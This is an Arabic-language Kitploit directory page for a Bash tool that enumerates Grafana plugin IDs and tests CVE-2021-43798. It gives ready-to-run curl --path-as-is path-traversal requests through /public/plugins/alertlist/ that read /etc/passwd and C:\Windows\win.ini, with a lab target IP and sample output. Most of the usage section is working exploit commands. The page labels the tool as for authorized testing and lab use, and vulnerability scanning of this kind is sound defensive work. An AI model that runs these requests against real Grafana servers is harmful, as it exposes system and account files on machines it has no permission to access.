Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — ماسح ضوئي يعتمد على Bash يقوم بإحصاء معرّفات إضافات Grafana واختبار ثغرة اجتياز المسار CVE-2021-43798 عبر محاولة قراءة /etc/passwd أو win.ini على النسخ المصابة. | Kitploit
أدوات/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
ماسحات الثغرات الأمنيةماسحات الثغرات الأمنية للويبالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

ماسح ضوئي يعتمد على Bash يقوم بإحصاء معرّفات إضافات Grafana واختبار ثغرة اجتياز المسار CVE-2021-43798 عبر محاولة قراءة /etc/passwd أو win.ini على النسخ المصابة.

عرض المستودع
1منذ 13س 27دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مُعدِّد إضافات Grafana CVE-2021-43798

أداة صغيرة مبنية على Bash لاختبار نسخ Grafana بحثًا عن CVE-2021-43798، وهي ثغرة اجتياز المسار (directory traversal) تؤثر على إصدارات Grafana المعرّضة للخطر.

تقوم الأداة بتعداد معرّفات إضافات Grafana وتستخدم curl --path-as-is لاختبار ما إذا كان اجتياز المسار قادرًا على الوصول إلى ملف معروف.

لأغراض اختبار الأمان المصرّح به وبيئات المختبر فقط.

الملفات

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: يختبر الوصول إلى C:\Windows\win.ini
  • grafana-linux.sh: يختبر الوصول إلى /etc/passwd
  • plugins.txt: قائمة كلمات تحتوي على معرّفات إضافات Grafana المستخدمة أثناء التعداد.

المتطلبات

  • Bash
  • curl
  • هدف Grafana
  • إذن لاختبار الهدف

تحقق من تثبيت curl:

root@kitploit:~
curl --version

اجعل السكربتات قابلة للتنفيذ:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

نظرة عامة على CVE-2021-43798

CVE-2021-43798 هي ثغرة اجتياز مسار (directory traversal) في Grafana.

تستند نقطة النهاية المعرّضة للخطر إلى: /public/plugins/<plugin-id>/

قد تسمح الثغرة بالاجتياز خارج دليل الإضافة المقصود.

الجزء المهم عند الاختبار باستخدام curl هو: --path-as-is

بدون هذا الخيار، قد يقوم العميل بتطبيع المسار قبل إرساله إلى الخادم.

ماسح Windows

يحاول ماسح Windows استرجاع: C:\Windows\win.ini

يُمثَّل المسار في طلب HTTP على النحو التالي: Windows/win.ini

الاستخدام الأساسي

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

مثال:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

اختبار Windows اليدوي

يمكنك اختبار إضافة يدويًا باستخدام:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

بالنسبة لهدف المختبر:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

يجب أن تحتوي الاستجابة الناجحة على محتويات ملف INI الخاص بـ Windows.

ماسح Linux

يحاول ماسح Linux استرجاع: /etc/passwd

الاستخدام الأساسي

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

مثال عام:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

اختبار Linux اليدوي

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

بالنسبة لهدف المختبر:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

يجب أن تحتوي استجابة Linux الناجحة على إدخالات مشابهة لـ:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

خيارات سطر الأوامر

يستخدم كلا الماسحين نفس الوسائط الأساسية:

  • u, --url : عنوان URL الأساسي لـ Grafana
  • w, --wordlist : قائمة كلمات الإضافات
  • f, --file : الملف المراد اختباره
  • h, --help : عرض المساعدة
تنزيل الأداة